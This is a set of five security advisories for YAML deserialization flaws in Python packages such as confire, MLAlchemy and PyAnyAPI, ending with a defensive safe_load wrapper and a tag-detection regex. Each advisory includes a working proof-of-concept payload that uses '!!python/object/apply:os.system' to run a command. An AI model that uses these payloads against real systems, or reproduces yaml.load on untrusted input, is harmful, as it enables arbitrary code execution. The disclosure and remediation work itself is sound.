CVE-2017-16764: Vulnerability in Django_make_app

Python Package:  django_make_app

Version:      Before 0.1.3

Published:    Nov. 10th. 2017

Reported by:       Joel

CVE-2017-16764    CVE_details

Overview

Django_make_app defines models and fields using YAML and generates an app for Django with views, forms, templates, etc. An issue was discovered in the django_make_app package before 0.1.3. Untrusted data passed into the read_yaml_file function can execute arbitrary Python commands, resulting in command execution.

POC

from django_make_app.io_utils import read_yaml_file

# read_yaml_file parses the file with yaml.load(), so a YAML tag that names
# a Python callable is executed during parsing.
yaml_raw_data = read_yaml_file('joel.yml')
# Contents of 'joel.yml':
# !!python/object/apply:os.system ["calc.exe"]

Remediation

At present, the maintainers have not released a fix. The package should use yaml.safe_load to parse the YAML file.

CVE-2017-16763: Configure Loaded Through Confire

Python Package:  confire

Version:      Before 0.2.0

Published:    Nov. 10th. 2017

Reported by:       Joel

CVE-2017-16763    CVE_details

Overview

Confire is a simple but powerful configuration scheme that builds on the configuration parsers of Scapy, elasticsearch, Django and others. Because the user-specific configuration is loaded from ~/.confire.yaml using yaml.load(), an issue was discovered in the Confire package before 0.2.0. Untrusted data placed in the confire.yaml files can execute arbitrary Python commands, resulting in command execution.

POC

from confire import Configuration

class MyConfig(Configuration):
    mysetting = True
    logpath   = "/var/log/myapp.log"
    appname   = "MyApp"

# Configuration.load() reads each of these files with yaml.load(); any of
# them that an attacker can write to is enough.
# CONF_PATHS = [
#     '/etc/confire.yaml',                    # The global configuration
#     os.path.expanduser('~/.confire.yaml'),  # User specific configuration
#     os.path.abspath('conf/confire.yaml')    # Local directory configuration
# ]
settings = MyConfig.load()
# Contents of '~/.confire.yaml':
# !!python/object/apply:os.system ["calc.exe"]

Remediation

The updated versions of confire correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16615: Critical RESTful Web Applications Vulnerability

Python Package:  MLAlchemy

Version:      Before 0.2.2

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16615    CVE_details

Overview

MLAlchemy is a Python-based utility library aimed at allowing relatively safe conversion from YAML/JSON to SQLAlchemy read-only queries. One use case is to allow RESTful web applications (written in Python) to receive YAML- or JSON-based queries for data, e.g. from a front-end JavaScript-based application. By exploiting this vulnerability, attackers can execute arbitrary Python commands, resulting in command execution. Because such queries are typically accepted from remote clients, the vulnerability is extremely dangerous.

An issue was discovered in the MLAlchemy package before 0.2.2. Untrusted data passed into the parse_yaml_query() function can execute arbitrary Python commands, resulting in command execution.

POC

from mlalchemy import parse_yaml_query

# The query string is parsed with yaml.load(), so the tag is executed
# before any query validation takes place.
parse_yaml_query('!!python/object/apply:os.system ["calc.exe"]')

PoC video

Remediation

The updated versions of MLAlchemy (0.2.2) correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16618: Convert Through OwlMixin

Python Package:  OwlMixin

Version:      Before 2.0.0a12

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16618    CVE_details

Overview

OwlMixin is a library that converts between data class instances and other representations. Recently, an issue was discovered in the owlmixin package before 2.0.0a12. Untrusted data passed into the load_yaml() and load_yamlf() functions can execute arbitrary Python commands, resulting in command execution.

POC

from owlmixin import util

# Both entry points hand the raw text to yaml.load().
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')
util.load_yamlf('joel.yml', 'utf-8')
# Contents of 'joel.yml':
# !!python/object/apply:os.system ["calc.exe"]

PoC video

Remediation

The updated versions of OwlMixin (2.0.0a12) correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16616: YAMLParser in PyAnyAPI

Python Package:  PyAnyAPI

Version:      Before 0.6.1

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16616    CVE_details

Overview

PyAnyAPI is a library for convenient interface creation over various types of data in a declarative way. An issue was discovered in the pyanyapi package before 0.6.1. Untrusted data passed into the yaml.load() function can execute arbitrary Python commands, resulting in command execution.

POC

from pyanyapi import YAMLParser

# YAMLParser.parse() feeds the document to yaml.load(); the tag is executed
# while the document is being constructed, before .test is ever looked up.
YAMLParser({'test': 'container > test'}).parse('!!python/object/apply:os.system ["calc.exe"]').test
YAMLParser({'test': 'container > test'}).parse('!!python/object/new:subprocess.check_output [["calc.exe"]]').test

PoC video

Remediation

The updated versions of PyAnyAPI (0.6.1) correctly use the yaml.safe_load method which prevents remote code execution.
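All five advisories above (django_make_app, confire, MLAlchemy, OwlMixin and PyAnyAPI) share one root cause: untrusted text reaches PyYAML's yaml.load(), whose default loaders honour the !!python/* tag family and turn it into live Python calls, and they share one remediation, yaml.safe_load. The following is an added example, not code from any of those packages, showing the hardened loader and a cheap pre-parse scanner a reviewer or log pipeline can run. It assumes PyYAML is installed for load_untrusted_yaml and is_safe_to_load; the sample documents are constructed for the example, and the tagged one calls os.getcwd rather than a shell so that it is harmless whichever loader sees it.

```python
"""Hardened loading of untrusted YAML plus a !!python/* tag scanner.

Added example (not code from django_make_app, confire, MLAlchemy, OwlMixin
or PyAnyAPI). Assumes PyYAML is installed for the two loader functions.
"""
import re

# PyYAML's Loader/FullLoader/UnsafeLoader resolve tags of this family into
# Python objects, callables or module attributes. SafeLoader has no
# constructor for any of them, which is why safe_load rejects them.
PYTHON_TAG_RE = re.compile(r"!!python/[A-Za-z_/]+(?::[\w.]+)?")


def find_python_tags(yaml_text):
    """Return (line_number, tag) for every !!python/* tag in the text.

    Use this as a detection aid (code review, config auditing, log review).
    It is not a substitute for a safe loader: YAML can also spell the same
    tag in its long form, '!<tag:yaml.org,2002:python/...>', which this
    short-form scanner deliberately does not try to cover.
    """
    hits = []
    for lineno, line in enumerate(yaml_text.splitlines(), start=1):
        for match in PYTHON_TAG_RE.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits


def load_untrusted_yaml(yaml_text):
    """Parse YAML that may come from an attacker.

    yaml.safe_load builds only plain data (dict, list, str, int, float, bool,
    None, datetime) and raises yaml.constructor.ConstructorError when it meets
    a tag it has no constructor for. This is the fix that confire 0.2.0,
    MLAlchemy 0.2.2, OwlMixin 2.0.0a12 and PyAnyAPI 0.6.1 adopted.
    """
    import yaml  # PyYAML, assumed installed
    return yaml.safe_load(yaml_text)


def is_safe_to_load(yaml_text):
    """True if safe_load accepts the document, False if it rejects a tag."""
    import yaml  # PyYAML, assumed installed
    try:
        load_untrusted_yaml(yaml_text)
    except yaml.YAMLError:  # ConstructorError is a subclass of YAMLError
        return False
    return True


# Constructed sample documents for the example. The second mirrors the shape
# of the advisory payloads but names os.getcwd, which only returns a string.
BENIGN_DOC = "mysetting: true\nlogpath: /var/log/myapp.log\nappname: MyApp\n"
TAGGED_DOC = "cwd: !!python/object/apply:os.getcwd []\n"

if __name__ == "__main__":
    print(find_python_tags(TAGGED_DOC))  # [(1, '!!python/object/apply:os.getcwd')]
    print(load_untrusted_yaml(BENIGN_DOC))
    print(is_safe_to_load(TAGGED_DOC))   # False: safe_load refuses the tag
```

Wiring the scanner in front of the loader gives an early, loud signal in logs; the loader itself is what actually closes the hole, because safe_load never resolves a tag it does not know, regardless of how the document is spelled.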